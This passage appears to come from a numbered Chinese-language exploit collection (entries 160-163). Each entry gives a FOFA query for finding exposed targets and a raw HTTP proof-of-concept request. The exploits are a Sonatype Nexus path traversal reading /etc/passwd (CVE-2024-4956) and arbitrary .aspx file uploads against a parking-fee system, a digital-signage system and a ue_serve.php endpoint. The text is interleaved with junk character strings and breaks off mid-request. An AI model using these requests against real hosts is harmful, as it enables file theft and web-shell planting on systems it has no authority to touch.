9 ~2 b$ J( H5 ~' L! c160. Sonatype Nexus Repository 3目录遍历与文件读取5 a7 A( s. e o/ U
CVE-2024-4956 3 ?/ e( O6 z: P# U1 A- X- rFOFA:title="Nexus Repository Manager" / ^/ ?: A3 i" D, z, p2 }3 g# pGET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.11 e% E' M7 k1 N5 i" I5 q$ ~8 y8 {
Host: x.x.x.x. y, f& u! C5 x- V! t# Q1 i$ p6 }
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0 ' f0 D; G$ k! f' G3 FConnection: close # ]3 ?1 x+ x3 p, x( H, i& m% C& hAccept: */*. s+ T3 }; e3 o! V/ B$ f4 `6 w \
Accept-Language: en7 i, m: |* Q. T. A @
Accept-Encoding: gzip0 r' {$ X5 f' H o& i# p
& ^6 H8 R! v# Q# E7 f+ a. a$ \+ g/ c4 x% s0 L! H& F# [1 P
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传 y" @, q- p/ w2 f% tFOFA:body="/KT_Css/qd_defaul.css" : C' g0 A2 W7 w( A第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密" a2 `" \' Z0 X) G
POST /Webservice.asmx HTTP/1.1* I9 b) s" E- F! X3 R: E& W
Host: x.x.x.x# H& [) i; q; d7 S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36 % n) i8 u& s: I* AConnection: close' q- F/ @% X" ]( a3 J: a
Content-Length: 4459 H$ U8 g% z8 V: Q# Z6 |
Content-Type: text/xml5 V6 {( z6 Z* F4 Q
Accept-Encoding: gzip4 _" U, I" \2 z7 U% D2 X9 T# c
! i9 x0 R+ {; J# @5 c4 m/ T<?xml version="1.0" encoding="utf-8"?> ! P$ Q( `* \2 B. C: C<soap:Envelope xmlns:xsi=": ^) k# _" {0 @; Z% ]6 P! B http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" 3 p1 |; Z- q" @" e; {xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> 2 l& d, [- v; z; E<soap:Body>4 N! h) b$ a; [( u
<UploadResume xmlns="http://tempuri.org/">2 }) T7 @) w, @1 X6 c. I
<ip>1</ip> ' _9 g7 {6 B: R, M( }<fileName>../../../../dizxdell.aspx</fileName>: v# f9 J% f- |! Z. B: N
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>4 r3 _, o+ _6 F0 G$ X5 v% f3 V
<tag>3</tag>( M$ o$ X1 g" n8 {& q
</UploadResume>8 I8 |& h$ v& ]' I" a( C! ?# P' `
</soap:Body>' Y( A: g6 F* k- e% @
</soap:Envelope>2 [& @6 z9 q, v1 E
8 Q: t' @& |' c4 E8 [3 q# Z
# W0 y1 c& O0 r5 `) [+ w http://x.x.x.x/dizxdell.aspx : n1 b- P. q& W! m" k/ X$ \! k9 H1 q1 z. F2 P- X, C7 H
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传 8 m% [3 V* I( x" d! n4 @FOFA: app="和丰山海-数字标牌": l! u/ u% l( |9 v* R! c: `8 [+ K
POST /QH.aspx HTTP/1.1 ' U+ K$ y. P/ u1 z" Q) Z. `Host: x.x.x.x 2 k) @" v, z. y$ `& y$ wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.05 U" B& f8 t* g& r+ ~" ~
Connection: close# p4 r. D" p, i% p
Content-Length: 583! Q% Y( R8 `* V
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey5 [: o0 R y) L9 A. I' e
Accept-Encoding: gzip- J! z- {- v# v. n. @0 _0 E
8 \. u! j/ s" W; a
------WebKitFormBoundaryeegvclmyurlotuey% s0 J0 I2 i/ @6 E. X8 t
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"% P0 N" y; `( x
Content-Type: application/octet-stream * z6 Z: B" J# D* o+ e% k: d( O0 Q; r% F
<% response.write("ujidwqfuuqjalgkvrpqy") %> ) s: }! z3 H3 F* h4 ^: `------WebKitFormBoundaryeegvclmyurlotuey 1 Z" m" X8 Y3 a% oContent-Disposition: form-data; name="action" % U2 x) [1 r" R, @- b7 C9 S Z0 P, a5 n x
upload 9 l1 V5 x! F& C. J4 |+ c1 o------WebKitFormBoundaryeegvclmyurlotuey' x6 }" O* L4 s- I B
Content-Disposition: form-data; name="responderId" & ^4 j9 Y5 d; x1 K7 I, C - s3 Z+ S! m0 P1 L* m; WResourceNewResponder ; m5 d+ E, u1 l$ A: a3 \------WebKitFormBoundaryeegvclmyurlotuey! P% I+ {) p- \3 }" ?* v
Content-Disposition: form-data; name="remotePath"; h/ B3 y P: M( Y4 r4 K
; o3 D- o, p. K+ B/opt/resources9 {1 b& n2 _! s/ a
------WebKitFormBoundaryeegvclmyurlotuey--: W5 a7 M9 x- n, M+ `* k
- a4 d% A- r7 @& Z. m
0 ^; N6 z' h& T+ K http://x.x.x.x/opt/resources/kjuhitjgk.aspx! [ m5 u0 M7 S5 ^6 P
8 q- I& |0 }- ^! U! U, y; B163. 号卡极团分销管理系统 ue_serve.php 任意文件上传- t' q1 ]" g4 u1 p) u3 a
FOFA: icon_hash="-795291075" $ ~6 S3 Y$ ], R0 {, y! ePOST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.10 w8 @# p3 `# i; T- i0 R" l
Host: x.x.x.x; ^: ?' f. N. O" ]6 I! }# Y; N
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.360 g& n& u5 {4 _5 {/ ~
Connection: close" z7 V9 `& c- U0 S6 S
Content-Length: 293 5 T( m) l3 t( ?3 B+ eAccept: */*; q% q; f' R2 Q& w- ], R9 I: K
Accept-Encoding: gzip, deflate. v; V' V& i* v( s5 b2 l2 f
Accept-Language: zh-CN,zh;q=0.9 9 @4 Q/ J7 n( J5 ~Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod , k+ S0 i8 l2 M) a4 H : W! e, S$ Z+ R( w1 ]------iiqvnofupvhdyrcoqyuujyetjvqgocod: n' {5 H4 A0 w* [* {9 G' s
Content-Disposition: form-data; name="name"6 _; M6 I% U- v4 o, ?; |+ ]